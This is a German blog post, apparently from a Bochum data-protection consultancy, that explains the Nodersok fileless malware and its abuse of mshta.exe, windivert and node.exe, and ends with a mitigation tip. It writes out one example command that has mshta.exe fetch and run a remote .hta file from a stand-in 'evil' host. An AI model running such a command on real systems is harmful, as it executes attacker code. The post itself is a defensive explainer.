T-O-Ms:
Nach Art. 32 DS-GVO sind Verantwortliche und Auftragsverarbeiter verpflichtet geeignete technische und organisatorische Maßnahmen (kurz: TOM) zu treffen, um ein dem Risiko angemessenes Schutzniveau zu gewährleisten.

 



Verfahrensbeschreibungen:
Bei Verfahrensbeschreibungen geht es darum, dass man erfasst, welche Daten überhaupt verarbeitet werden. Dazu sollen werden der Zweck, die Rechtsgrundlage, die Speicherdauer sowie die Rechtsgrundlage der Datenerfassung benannt werden.

 



Risiko-Folgenabschätzungen:
Hier geht es um die Folgenabschätzung eines Datenmissbrauchs: Was würde passieren, wenn die Daten in falsche Hände geraten würden? Im Datenschutz-Sprech wird das "Datenschutz-Folgenabschätzung" genannt. Aus der Analyse sollen entsprechend angemessene Maßnahmen abgeleitet werden.

 



Neuland:
Datenschutz im Internet: Webseitenbetreibern werden bestimmte Pflichten auferlegt, um den Datenschutz der Seitenbesucher zu gewährleisten. Hier geht es um das Erfüllen dieser Auflagen.

Home

Nodersok - Living off the Land

Ich war am Wochenenende in Berlin. Es war der Berlin Marathon und im Stadtkern waren etliche Strassen gesperrt. Da wurde es auf den verbleibenden Straßen noch voller, als es dort - aus Bochumer Sicht - sonst so ist. Da kommen einem schon Idee, wie schön es sein könnte, auf dem Land zu wohnen.

Diese Idee hatten wohl auch die Schöpfer der Maleware "Nodersok" (der Name stammt vom Microsoft Defender ATP Research Team und ich konnte leider nicht herausfinden, was er bedeutet :-( ). Jedenfalls schwärmte das Nodersok-Entwicklerteam wohl auch davon sein ganzes Zeug außerhalb des Kerns zu halten.

Die Maleware nutzt Living-off-the-Land-Bibliotheken um sich an legale MIcrosoft-Tools anzuhängen und den "bösen Code" dateilos nachzuladen. Bei einer forensischen Analyse findet man kein befallenen Dateien auf dem System, wenn man keine Memory-Analyse macht. Die "legalen Tools" die Nordersok verwendet sind u.a. windivert.dll/sys (das ist Tool mit dem Netzwerk Pakete mitgelesen, gefiltert und verändert werden können. Es kann "silent" installiert werden (also ohne User-Interaktion). Außerdem wird Node.exe verwendet, das von vielen Webapplikationen gebraucht wird, die mit dem node.js-Framework arbeiten.

Nach einer Anlayse von Microsoft sind die meisten Installationen in den US und Großbritannien festgestellt  worden (60% + 21%). Auf Platz 3 ist aber schon Deutschland mit 8%.

Microsoft sagt, dass die Infektion schwer zu erkennen war, weil diese "unter dem Radar" lief. Mitte Juli 2019 fiel Nordersok dann aber doch auf und Microsoft stelte durch die Auswertungen der Microsoft Defender telemetire-Daten fest, dass "MSHTA.exe" ungewöhnliche Daten versendete. MSHTA.exe führt HTML-Applikationen aus, indem das Programm mit einer ".hta"-Datei ausgeführt wird. Die Sysntax dazu lautet wie folgt:

 mshta.exe http[:]//boese_seite.de/boeser_code.hta

Aber es nicht auf die Ausführung von .hta-Dateien begrenzt. Wen es interessiert, der kann sich hier bei McAfee eine tiefere Erklärung anschauen. Dann erkennt man, wie umfänglich die Möglichkeiten sind.

Microsoft hat ein schönes Infektions-Diagramm erstellt, dass man sich hier anschauen kann: https://www.microsoft.com/security/blog/wp-content/uploads/2019/09/Fig3c-Nodersok-attack-chain.png

Was hilft? McAfee empfiehlt die Default-Application für .hta-Dateien von MSHTA.exe auf Editor.exe umzustellen.

Datenschutz Bochum meint: Zwar ist es scheibar schön ruhig auf dem Land, aber nicht ungefährlich.